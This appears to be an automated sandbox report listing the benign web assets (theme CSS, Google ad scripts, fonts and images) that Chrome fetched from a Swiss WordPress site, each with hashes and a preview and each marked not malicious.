                                                                                                                                            Preview:@charset "UTF-8";./*.Theme Name: ColorMag Pro.Theme URI: https://themegrill.com/themes/colormag/.Author: ThemeGrill.Author URI: https://themegrill.com/wordpress-themes/.Description: ColorMag Pro is the pro version of ColorMag free theme..Version: 4.1.12.Tested up to: 6.6.Requires PHP: 5.6.License: GNU General Public License, version 3 (GPLv3).License URI: http://www.gnu.org/licenses/gpl-3.0.txt.Tags: one-column, two-columns, right-sidebar, left-sidebar, flexible-header, custom-header, custom-background, custom-menu, custom-colors, sticky-post, threaded-comments, translation-ready, featured-images, theme-options, post-formats, footer-widgets, blog, e-commerce, news, rtl-language-support.Text Domain: colormag..Resetting and rebuilding styles have been helped along thanks to the fine work of.Eric Meyer http://meyerweb.com/eric/tools/css/reset/index.html.along with Nicolas Gallagher and Jonathan Neal http://necolas.github.com/normalize.css/.and Blueprint http://www.blueprintcss.org/.*/./*-
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (786)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1672
                                                                                                                                            Entropy (8bit):5.286735414643417
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:AB304529064B2C30C88FC41AD81913E0
                                                                                                                                            SHA1:14091E21A049D97B052DD56FF4076898F6F7D0CC
                                                                                                                                            SHA-256:88C5A7E6C9B3319F4BE9CD873D1E19766A62BE628EA9921156DD2702F1D15031
                                                                                                                                            SHA-512:6F8A7C3D2516C88E172D6AF1F88B0F32242A737BA128F95E0668D57EE004384DAFE4011A84FC543BA477A7BC82A8D47862F1F276F0C89FA0087D63E4D3B72691
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://tpc.googlesyndication.com/pagead/js/r20241212/r20110914/client/load_preloaded_resource_fy2021.js
                                                                                                                                            Preview:(function(){'use strict';let e=[];const f=()=>{const a=e;e=[];for(const b of a)try{b()}catch{}};function g(a=document){return a.createElement("img")};function h(a=null){return a&&a.getAttribute("data-jc")==="26"?a:document.querySelector('[data-jc="26"]')};var k=document;/* . . Copyright The Closure Library Authors. . SPDX-License-Identifier: Apache-2.0 .*/ .var m=()=>{var a=k.querySelectorAll("link[data-reload-stylesheet][as=style][rel=preload]");for(var b=0;b<a.length;b++){var c=a[b],d="link",l=document;d=String(d);l.contentType==="application/xhtml+xml"&&(d=d.toLowerCase());d=l.createElement(d);d.setAttribute("rel","stylesheet");d.setAttribute("href",c.getAttribute("href"));k.head.appendChild(d)}if(a.length>0&&!(Math.random()>.01)){a=(a=h(document.currentScript))&&a.getAttribute("data-jc-rcd")==="true"?"pagead2.googlesyndication-cn.com":"pagead2.googlesyndication.com"; .b=(b=h(document.currentScript))&&b.getAttribute("data-jc-version")||"unknown";a=`https://${a}/pagead/gen_204?id=jca
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2
                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E0AA021E21DDDBD6D8CECEC71E9CF564
                                                                                                                                            SHA1:9CE3BD4224C8C1780DB56B4125ECF3F24BF748B7
                                                                                                                                            SHA-256:565339BC4D33D72817B583024112EB7F5CDF3E5EEF0252D6EC1B9C9A94E12BB3
                                                                                                                                            SHA-512:900110C951560EFF857B440E89CC29F529416E0E3B3D7F0AD51651BFDBD8025B91768C5ED7DB5352D1A5523354CE06CED2C42047E33A3E958A1BBA5F742DB874
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://pexus.prod.tda.link/v1/create/3986824819333487976/e650f25a18e5a55b769dc6e2495294b4/https%3A%2F%2Fphothockey.ch%2F
                                                                                                                                            Preview:OK
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (7721), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7721
                                                                                                                                            Entropy (8bit):5.079204755086245
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:443EE467D8CDA52DCA70F4D322E05C38
                                                                                                                                            SHA1:0EB5AA5AF4530E6B25F22B84B42FE23801F710A9
                                                                                                                                            SHA-256:925F51766EFB21B01C382352B4CCE4BB6063186FFE1342EA902390E5F17432FE
                                                                                                                                            SHA-512:90083D1D80B7B4A29AFF6C70F9D24EF61644FFF5F2E91DC439E8F30CA7F270864686D388D0421EFB4B05B57D84840392CC1C4070D1481957F3E5E8F96819CC41
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:!function(e){var a={};function t(r){if(a[r])return a[r].exports;var s=a[r]={i:r,l:!1,exports:{}};return e[r].call(s.exports,s,s.exports,t),s.l=!0,s.exports}t.m=e,t.c=a,t.d=function(e,a,r){t.o(e,a)||Object.defineProperty(e,a,{enumerable:!0,get:r})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,a){if(1&a&&(e=t(e)),8&a)return e;if(4&a&&"object"==typeof e&&e&&e.__esModule)return e;var r=Object.create(null);if(t.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:e}),2&a&&"string"!=typeof e)for(var s in e)t.d(r,s,function(a){return e[a]}.bind(null,s));return r},t.n=function(e){var a=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(a,"a",a),a},t.o=function(e,a){return Object.prototype.hasOwnProperty.call(e,a)},t.p="",t(t.s=399)}({399:function(e,a){!function(e){"use strict";var a=window.AFTHRAMPES_JS||{};function t(
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format, TrueType, length 78156, version 3.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):78156
                                                                                                                                            Entropy (8bit):7.991471569087356
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:1A592F9655AC68DB7BA196134E938D74
                                                                                                                                            SHA1:8EDC1A005636480304808FD9393C49ECAE3D7E23
                                                                                                                                            SHA-256:A1434CB9EEE1F618CFA38F76759C919E606679BB2BEB2CADD62964361C43A741
                                                                                                                                            SHA-512:1E76A2B09596515BFC771F9DC3386124F4E26AD2805E409937908EFDF853D937A1D1CF5ED67E26808708CE6359AE3156D5CF8D8D2F312B221B451AE90E16B701
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/assets/fonts/OpenSans-Bold.woff
                                                                                                                                            Preview:wOFF......1L................................FFTM..10............GDEF...x........c.[.GPOS...... "..L._.TGSUB...8........,.1.OS/2.......U...`.y..cmap............YD..cvt ............=I,.fpgm...............Zgasp...h...........#glyf.."(.....Tt....head.......6...6..4.hhea.......!...$.)..hmtx...h...~.......loca...x.........O.xmaxp....... ... ...lname.............N.-post..........'n..Qqprep..............{........B g.Q_.<..................w&Q....................x.c`d`.........7.w\..@.d.R...h..........v....._......./.......J....x.c`aec......j.r...a..f:.`.4...<``.... .dj........x...........S7...|.....6 ............x....H^.....s.T.8.2..B..ED\(.Yk......q....E..?...#.).D.,.7.E..,.RJ&......da."El)..J.NFg}.y.=75o..^..=..s.=...8.y.].?..j..\...DP/.fF....=.....w..%mf@....)........H_.\.y.......;t.>..H..0j..`B$8#KA....e..s\..XxX...E..t.?!K..Y./.A..;.W.A3/.R..c".m..+bv..4.i.\.....~...}%.....TI....<`.e...,....)z.2...m..FkR.~.._.g.y)......{.fJ$.L.MQ*..?.f.%9l..;p...iO{.h.(../e.e...._%.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4061
                                                                                                                                            Entropy (8bit):7.766428548031364
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:6BDBC3E4255D3F01236117147570827D
                                                                                                                                            SHA1:9D31B2E0517A33A343E41C729A5126C3E88F698B
                                                                                                                                            SHA-256:850963B462CD40414373C2915237FCD3219851B1CE0160DCE55B47F11D56C70B
                                                                                                                                            SHA-512:73239D75537D5C7FB0314819428210DBC795048387972EB62CE591857BF42E8B6952B66C45FD5E48D9469069815DA275B5CCB946DAA114676596B6AEFDA42496
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z...."................................................................................;.9..-.[...#.8...m..2.h.Y.g.;.u...7..cK.J...Q..Z...-.>..).acJ....._......Z.....H.&.V....<.N.\.:0..U..8+u....Zt..!t.J}EY.>.T.dU]......73...M$k.u...a..../....v.WY.y.m.?M..%v.@...Hsm{.<.y.D.....z...O...W..?..k.......:.H. \..ys.O..x....GnKD..rH.R....Eo....y.................................!1.A."Q... #$24B...............l*...d.._(:<.... .c1..%.=v1.v;f...;..P......;e....l....vO..G...fX.z..aS&kN.=..2.:.X.dPG..'...f..U.i5....X...V...0O;..mm..A....a!...-.!...>=.G...=.!....I.WE..kw-EJ.Vlz.....(..R.Q..NNxE0..!.T....f!....L+h..Z....^.L,b.......#.l.I..%
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):205
                                                                                                                                            Entropy (8bit):6.471232950817362
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:4087858E2C9DB9AA8F6A840AEDCFB533
                                                                                                                                            SHA1:D1FFE861DA6BD0E95FD1A365B0C3D3CEB6CD58A3
                                                                                                                                            SHA-256:4D45982F2DC34F36C9045EE46A75A1943666BB7FD64E103CAC8C7429E7012840
                                                                                                                                            SHA-512:541228667C513266FFAC017AA43CCACEA410E20BF27D30599276E9984FAC2C433AC58288C19F7A5BFEB1C9B4074B8C9C472080BF1C706303F97B2CE73DBD634F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.PNG........IHDR...0...0.......1.....IDATx...1..1.DQ.f....@H.....%`..j.M&"....5....;...;.......\.....\..U.4..pe.<.P.....%... ...@....p.....@...X...5..{.$.x^....y=..z.......|.......+.........IEND.B`.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (430), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):430
                                                                                                                                            Entropy (8bit):5.358970616032804
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:EEF3605FA920D2EE0E77FEA46222011B
                                                                                                                                            SHA1:08C3832778650C13FD2E09ACE6CA70B1297FDE34
                                                                                                                                            SHA-256:EBE1E3C5F4F6B1BA3AF34DBBC1511537E2582CE24DC407444AA5E28EC59BE920
                                                                                                                                            SHA-512:F77044B131A641EE4574E0D3C31CEFFEDC998AD559C2F688AD03ECB7DCF5375B0CD37FD2A0D5CE23490D180A728A1E0DF82623F074639BB5187F985C6C0C7A67
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/ads?gdpr=0&client=ca-pub-5534394335622311&output=html&h=280&adk=2621726817&adf=3076280727&pi=t.aa~a.2011184790~rp.1&w=1140&abgtt=6&fwrn=4&fwrnh=100&lmt=1736177827&rafmt=1&to=qs&pwprc=9468878717&format=1140x280&url=https%3A%2F%2Fphothockey.ch%2F&fwr=0&pra=3&rpe=1&resp_fmts=3&wgl=1&fa=40&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0.&dt=1736177825828&bpp=1&bdt=5129&idt=-M&shv=r20241212&mjsv=m202412090101&ptt=9&saldr=aa&abxe=1&cookie=ID%3D271b0c5861eb301c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MbbkKdxZ3r4oXe0CAZ1aXtk3TXpXw&gpic=UID%3D00000fa80f72307c%3AT%3D1736177771%3ART%3D1736177771%3AS%3DALNI_MYYYAF9Bdmqy81LoPXnol1uur86yA&eo_id_str=ID%3Dcfbf4971db1f6709%3AT%3D1736177771%3ART%3D1736177771%3AS%3DAA-AfjaNDk_NqCEVnmF5j0CX-A32&prev_fmts=0x0%2C1200x280%2C1140x280%2C1140x280&nras=5&correlator=3048303595490&frm=20&pv=1&u_tz=-300&u_his=1&u_h=1024&u_w=1280&u_ah=984&u_aw=1280&u_cd=24&u_sd=1&dmc=8&adx=70&ady=2730&biw=1280&bih=907&scr_x=0&scr_y=0&eid=31088580%2C95344789%2C95347433&oid=2&pvsid=3658152886269661&tmod=1523322118&uas=0&nvt=2&fc=1920&brdim=0%2C0%2C0%2C0%2C1280%2C0%2C1280%2C984%2C1280%2C907&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=128&bc=31&bz=1&td=1&tdf=0&psd=W251bGwsbnVsbCxudWxsLDNd&nt=1&ifi=5&uci=a!5&btvi=2&fsb=1&dtd=1427
                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.top.postMessage('{"msg_type":"resize-me","key_value":[{"key":"r_nh","value":"0"},{"key":"r_ifr","value":"true"},{"key":"qid","value":"CKr0jra24YoDFefLEQgdj9saNg"}],"googMsgType":"sth"}', '*');</script><script>window.top.postMessage('{"msg_type":"adsense-labs","key_value":[{"key":"settings","value":"[\\\"ca-pub-5534394335622311\\\"]"}],"googMsgType":"sth"}', '*');</script></head></html>
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):9442
                                                                                                                                            Entropy (8bit):7.958528188026398
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:E059518F35B04F04444B518242899E58
                                                                                                                                            SHA1:0DE65D0610F009AA393A13B1D9DDFEC61BA470A0
                                                                                                                                            SHA-256:A48727741381DB878EAB59EC209672AB4C152B649324D1B4BCEA8521A1451A15
                                                                                                                                            SHA-512:84EB250BAA056F06BC33950047951569DFDCFA1E2964418373017354F20C29563B8AFB94127934585138B5DB3570A673A96C7A467BBA26038236746B7895A73B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_5061.jpg
                                                                                                                                            Preview:RIFF.$..WEBPVP8X..............VP8 .#.......*....>.H.L%.,.%3.....em.0i?..x[....FE.F;.X.3=gw;.R..D...~k.t~.....................p........?s...m."..`n..$| ...;g..+....`.'B..:._9.6$q"{M*kt.5.....A.....].//o.Kf....Qu..c|>..w.[...8Pf.E..W.VE.....6...Z;n>.e\ . ...._.^I.M.VI.}......~.CP......]Px$..7.R..R.;.I-..<M.......7.]....'.?.M(.~3.].>p......!}t?...l.R'q.....s.......T.]#D/5[......e..@..3..GiP.sr.K...AH.{..F..y.S`...p......q.Z......5J.n..wik.9...N...\.....=..Z.8F.&s.JZ..Y.5.P....v.?..C....P.m|.=..?........~!....c"._..09.K...SX...G.~..N..m.[R.V..d..0...X..r=6Q............R..t..@p"Tm.=\.=i..`...p.....?.;B...+&y~q...........aN.*..:.&..Pv.~...z...zI.6.._X....x?%%".j..>{.*k...w..c..:...b,-.K.q}.?.....W.yk....C.n&.z....v...I......q3.....v.Y....NL.~.Z.pWrC..W/l-.....Pz.em.@.)8.D.L..b:G..../...jY....}.G...z.N....Y..U...i.(.bK.....*4~..>..?...&&KQ.xF...Js$..".3I_.....'.b.........Ml....).oU.G.{.a... k..@Z.s.H....?)".......@|9.G...T...j`.r.X$}&..G.....h>N.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):27787
                                                                                                                                            Entropy (8bit):4.833972475539196
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:79EB2937E3B89D4769F524A8AB9694B9
                                                                                                                                            SHA1:08E6BB5777663A54BC94F7B43C0B8386478E69AD
                                                                                                                                            SHA-256:4FB41C31D096FCF6FA8F5A791271516164B9851DA5EBB114FB804FD340FD72E5
                                                                                                                                            SHA-512:B63249A7A620CDAEDEB6B230FB21139CA6DC90F9F3B8DDAD033B72E9CC2D11E9920691FCFFF69CCA16FA7A5F84ABFF8C2725627C7536731EA15D86745D4B5F0D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/wpzoom-socicon.css?ver=1732743635
                                                                                                                                            Preview:@font-face {. font-family: 'wpzoom-socicon';. src: url('../font/socicon.woff2?v=4.3.3') format('woff2');. font-weight: normal;. font-style: normal;. text-transform: initial;. font-display: block;.}../* inline icon. ========================================================================== */..socicon {. position: relative;. top: 3px;. display: inline-block;. font-family: 'wpzoom-socicon';. font-style: normal;. font-weight: normal;. line-height: 1;. -webkit-font-smoothing: antialiased;. -moz-osx-font-smoothing: grayscale;. font-size: 1.2em;.}...wp-block-wpzoom-blocks-social-icons .socicon,..zoom-social-icons-widget .socicon {. font-family: 'wpzoom-socicon' !important;.}...socicon:empty {. width: 1em;.}...socicon-500px {. background-color: #58a9de;. color: #58a9de;.}...social-icon.socicon-500px:before {. content: "\e056".}...socicon-airbnb {. background-color: #FF5A5F;. color: #FF5A5F;.}...social-icon.socicon-airbnb:b
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 392x272, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15687
                                                                                                                                            Entropy (8bit):7.9497473104191725
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:A9128BD041DE69963F4E122B728FD6FF
                                                                                                                                            SHA1:C529CBBB755FD4E6D93067F72B8264AF142EBFF9
                                                                                                                                            SHA-256:70DACF9DA18D679F357F1D6CF625C4538CB6B57C837128BE5137F264E2D674F7
                                                                                                                                            SHA-512:36406BDA72F1925E7A37A56CE47ECC7DECBB5B4CD6942FCC8E7A63BA5AB01277DB79314203F9C47F1880C728354AF6EAEC31CEBA09BE752A064BF8750E5F6F96
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100...........................................C.............................$......$ &...& 9-''-9B747BOGGOd_d......C.............................$......$ &...& 9-''-9B747BOGGOd_d.............."..................................................................................M?.|...].,U.....jC-..3C..W..j...4..E....X<.b....i.SFZq......2.j.(#W.IF.YX4....rs.....F../.Z...z.......I....s.JF.A.B.1.P.....#l.pw!%b..D.d... $...J..@O>.!e..88.P..6r.\c..h8........et..&u....h.U.B..G.y%.B.R..Sz*.h96.....:..wnk..6..().Y.%..B..D....i....G........;zA.........&oS/~...:.i.s.t..l...B/......[E...L.*<..t.V.....f....D.F.Jh....K..\._(.9..y..^w...W..=T..%E....(z.;.V..F.k....T-....o}.h].......7....e..Q..T.R-.1.zEG6[(....0..6}."*.NOG/-.e.-..,......h.2m......z...y.&..]...<.sZ.....'.J.lcg.$t....X.....B..3L.C..o.%.....~..MV...P.....M..GH.w.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (551)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):227261
                                                                                                                                            Entropy (8bit):5.483775665452673
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:7204A090B5E030D4C2CD9FF168D00C7A
                                                                                                                                            SHA1:B68C14E834050BD237D222F7F8772C8D87EC1BE9
                                                                                                                                            SHA-256:1B16FB7B71EB885AB2F0310063BA192F2786F428CD4F52C21596C88CCD8DD848
                                                                                                                                            SHA-512:DFD75CC95F1FC5919B7E7EF5430C45E09069E2B0A0D9EA6D5333737CA3FBE297320C067654E54D79A4CACA17E4B413BE5B09E3C55EE835308FF345B533F676AC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:.(function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function u(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length)return{next:La(ba)};throw Error(String(ba)+" is not an iterable or ArrayLike");}function Pa(ba){for(var ta,$a=[];!(ta=ba.next()).done;)$a.push(ta.value);return $a}function Va(ba){return ba instanceof Array?ba:Pa(u(ba))}.var Of="function"==typeof Object.create?Object.create:function(ba){function ta(){}ta.prototype=ba;return new ta},Pf;if("function"==typeof Object.setPrototypeOf)Pf=Object.setPrototypeOf;else{var Mh;a:{var Nh={a:!0},Oh={};try{Oh.__proto__=Nh;Mh=Oh.a;break a}catch(ba){}Mh=!1}Pf=Mh?function(ba,ta){ba.__proto__=ta;if(ba.__proto__!==ta)throw new TypeError(ba+" is not extensible");return ba}:null}var Fm=Pf;.function Gm(ba,ta){ba.prototype=Of(ta.prototype);ba.prototype.constructor=ba;if(Fm)Fm(ba,ta);else for(var $a in ta)if("p
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 52648, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):52648
                                                                                                                                            Entropy (8bit):7.996033428788516
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:657E828FB3A5963706E24CBF9D711BB8
                                                                                                                                            SHA1:84C08557D977E0A46EC8941B2D84235069DAB229
                                                                                                                                            SHA-256:45E39853C41558C4922FF1B0895547A99E378F136EC3D9D2F4DF15CC269485FA
                                                                                                                                            SHA-512:EEBEDF24A2516B860FFA2C9241474157604F8FC2EDC9E3BF3C0A0DDDF3168519F13FC195D48D232ED8F4A5DB1C48EF0563D62B2E2BDCF55F936CBD319AB18E16
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://use.fontawesome.com/releases/v5.0.0/webfonts/fa-brands-400.woff2
                                                                                                                                            Preview:wOF2.............r....V.........................T.V..f...h..X.6.$..|..... ..*..m[.#qB.......*...v......@(B...............1......T+.....d.2OaAf.j.....b.>.........?2|/F...PR*J4[ &..b....E......../...q..4`M*D.c...-|.a.q.b..h..m..4....... ..N...?B....k.?.Ja.F7=....u|....zx..z..L.....ht......:w.-.P..!...Yh..q.=..'aP[........ .d.u......D65...,.HD.6..........8..4...(...V.........Q..../...8@.+J.B*..I.L........N...sn.n............&.5.rC0.nc,.X...".0r......D.."*F.6........b..._.....q$.c.[.y......../.0..#..$,.?..P......_...J..&...).c^.do...;~.....^...K...........7.[...BN..I.o.8.....{.....K.I#....~w._[e..... ..C@.n*.qd.....]T..Im.....';...."Y.,S$.I.N...6....m.!...;...2.m9E.\..d.=.W...{...S.#...y$T...]G...Bdp^.#.B....@a];.Q}....._.f..Y.I-....!9...].F/a.[.^..0..VMw..@..]...[.......-.~....U..)m....fc..N..-..iI.l]........u.{..k.y....+)X-.+p.V<.19.q.u8...T....n"..u....~..lIj.\..l....Pa$.$....i.....4%.....k.....e...\l9d..d...R.ij..NHRP:..>...s`.|
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (30510)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):30673
                                                                                                                                            Entropy (8bit):4.731693426618086
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:667681BA193116F0A58EFF88EE58F43D
                                                                                                                                            SHA1:D229366C090D12B65F6AF960BC6AF4EEF7EBA671
                                                                                                                                            SHA-256:014DA2C2FC006D274518C09E430D055E117EFC0F76BE195E24998DD0C8EA92F6
                                                                                                                                            SHA-512:1829E07578EC8D6113809F43F51E91839D62387FCC763251326BC1ABE223B48A8F2CD45DC1A41B92BD2AE4453D4A827E0C1472D15FCFC7AB50B2B6C6C712A0CE
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/assets/css/font-awesome-3.min.css?ver=1732743635
                                                                                                                                            Preview:/*!. * Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../font/fontawesome-webfont.woff2?v=4.7.0') format('woff2');font-weight:normal;font-style:normal;font-display: block;}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-fw{width:1.28571429em;text-align:center}.fa-ul{padding-left:0;margin-left:2.14285714em;list-style-type:none}.fa-ul>li{position:relative}.fa-li{position:absolute;left:-2.14285714em;width:2.14285714em;top:.14285714em;text-align:center}.fa-li.fa-lg{left:-1.85714286em}.fa-border{padding:.2em .25em .15em;border:solid .08em #eee;border-radius
                                                                                                                                            No static file info